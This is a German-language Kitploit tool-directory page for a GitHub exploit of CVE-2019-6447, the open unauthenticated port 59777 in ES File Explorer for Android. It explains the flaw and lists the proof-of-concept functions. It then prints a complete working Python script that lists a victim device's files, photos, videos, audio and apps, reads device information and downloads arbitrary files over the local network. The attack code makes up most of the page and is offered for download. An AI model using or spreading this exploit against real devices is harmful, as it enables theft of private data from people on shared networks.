Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
EsFileExplorer-CVE-2019-6447 — Ausnutzen einer Android-Sicherheitslücke im ES File Explorer | Kitploit
Tools/GitHubGitHub/chethine/esfileexplorer-cve-2019-6447
Android-SicherheitSchwachstellenanalyseExploitationDatenexfiltrationInformationsbeschaffungMobile Sicherheit
GitHubchethine/esfileexplorer-cve-2019-6447

EsFileExplorer-CVE-2019-6447

Ausnutzen einer Android-Sicherheitslücke im ES File Explorer

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
3136vor 4 JahrenNoch nicht geprüft

EsFileExplorer-CVE-2019-6447

Ausnutzen der Android-Sicherheitslücke im ES Datei-Explorer

Sicherheitslücke

Der ES Datei-Explorer wurde von ES worldwide entwickelt, einem Teil von DO Global mit Sitz in China. Dieser ES Datei-Explorer ist nur für mobile Geräte mit dem Android-Betriebssystem verfügbar. Derzeit wurde ES File Explorer insgesamt über 100 Millionen Mal heruntergeladen. Diese App ist der bekannte Datei-Explorer für Android und erhält daher viel Aufmerksamkeit. Andererseits entdeckten Cybersicherheitsforscher im Jahr 2019 eine Sicherheitslücke in der Version 4.1.9.7.4 des ES Datei-Explorers. Angreifer, die diese Sicherheitslücke ausnutzen können, sind in der Lage, alle sensiblen Benutzerdaten zu sammeln, die im ES Datei-Explorer gespeichert sind. Dazu gehören Fotos, Videos, Sprachaufnahmen, Dokumente und andere Datentypen.

Beschreibung der Sicherheitslücke

Bis zur Version 4.1.9.7.4 ermöglicht die ES File Explorer File Manager-Anwendung für Android entfernten Angreifern, beliebige Dateien zu lesen oder Apps in einem lokalen Wi-Fi-Netzwerk auszuführen, indem sie Anfragen an den TCP-Port 59777 senden. Nachdem die ES-App einmal gestartet wurde, bleibt dieser TCP-Port offen und antwortet auf nicht authentifizierte application/json-Daten, die über HTTP gesendet werden.

Betroffene Version

Version 4.1.9.7.4

Jedes Mal, wenn ein Benutzer die App startet, wird ein HTTP-Server gestartet. Dieser Server öffnet lokal den Port 59777:
root@kitploit:~
angler:/ # netstat -ap | grep com.estrongs
tcp6       0      0 :::59777                :::*                    LISTEN      5696/com.estrongs.android.pop

Proof of Concept (POC) Funktionen

  • Alle Dateien auf der SD-Karte des Opfergeräts auflisten
  • Alle Bilder auf dem Opfergerät auflisten
  • Alle Videos auf dem Opfergerät auflisten
  • Alle Audiodateien auf dem Opfergerät auflisten
  • Alle installierten Apps auf dem Opfergerät auflisten
  • Alle System-Apps auf dem Opfergerät auflisten
  • Alle Telefon-Apps auf dem Opfergerät auflisten
  • Alle APK-Dateien auf der SD-Karte des Opfergeräts auflisten
  • Alle installierten Apps auf dem Opfergerät auflisten
  • Geräteinformationen des Opfergeräts abrufen
  • Eine Datei vom Opfergerät herunterladen
  • Eine App Ihrer Wahl starten
  • Das Symbol einer App Ihrer Wahl abrufen

Payload

root@kitploit:~
import requests
import json
import ast
import sys

if len(sys.argv) < 3:
    print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]")
    sys.exit(1)

url = 'http://' + sys.argv[2] + ':59777'
cmd = sys.argv[1]
cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo']
listCmds = cmds[:9]
if cmd not in cmds:
    print("[-] WRONG COMMAND!")
    print("Available commands : ")
    print("  listFiles         : List all Files.")
    print("  listPics          : List all Pictures.")
    print("  listVideos        : List all videos.")
    print("  listAudios        : List all audios.")
    print("  listApps          : List Applications installed.")
    print("  listAppsSystem    : List System apps.")
    print("  listAppsPhone     : List Communication related apps.")
    print("  listAppsSdcard    : List apps on the SDCard.")
    print("  listAppsAll       : List all Application.")
    print("  getFile           : Download a file.")
    print("  getDeviceInfo     : Get device info.")
    sys.exit(1)

print("\n==================================================================")
print("|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |")
print("|                Coded By : Nehal a.k.a PwnerSec                 |")
print("==================================================================\n")

header = {"Content-Type" : "application/json"}
proxy = {"http":"http://127.0.0.1:8080", "https":"https://127.0.0.1:8080"}

def httpPost(cmd):
    data = json.dumps({"command":cmd})
    response = requests.post(url, headers=header, data=data)
    return ast.literal_eval(response.text)

def parse(text, keys):
    for dic in text:
        for key in keys:
            print(f"{key} : {dic[key]}")
        print('')

def do_listing(cmd):
    response = httpPost(cmd)
    if len(response) == 0:
        keys = []
    else:
        keys = list(response[0].keys())
    parse(response, keys)

if cmd in listCmds:
    do_listing(cmd)

elif cmd == cmds[9]:
    if len(sys.argv) != 4:
        print("[+] Include file name to download.")
        sys.exit(1)
    elif sys.argv[3][0] != '/':
        print("[-] You need to provide full path of the file.")
        sys.exit(1)
    else:
        path = sys.argv[3]
        print("[+] Downloading file...")
        response = requests.get(url + path)
        with open('out.dat','wb') as wf:
            wf.write(response.content)
        print("[+] Done. Saved as `out.dat`.")

elif cmd == cmds[10]:
    response = httpPost(cmd)
    keys = list(response.keys())
    for key in keys:
        print(f"{key} : {response[key]}")

Demonstration

Demo

Kontakt

Folge mir auf Twitter!
Vernetze dich mit mir auf LinkedIn!
Tool herunterladen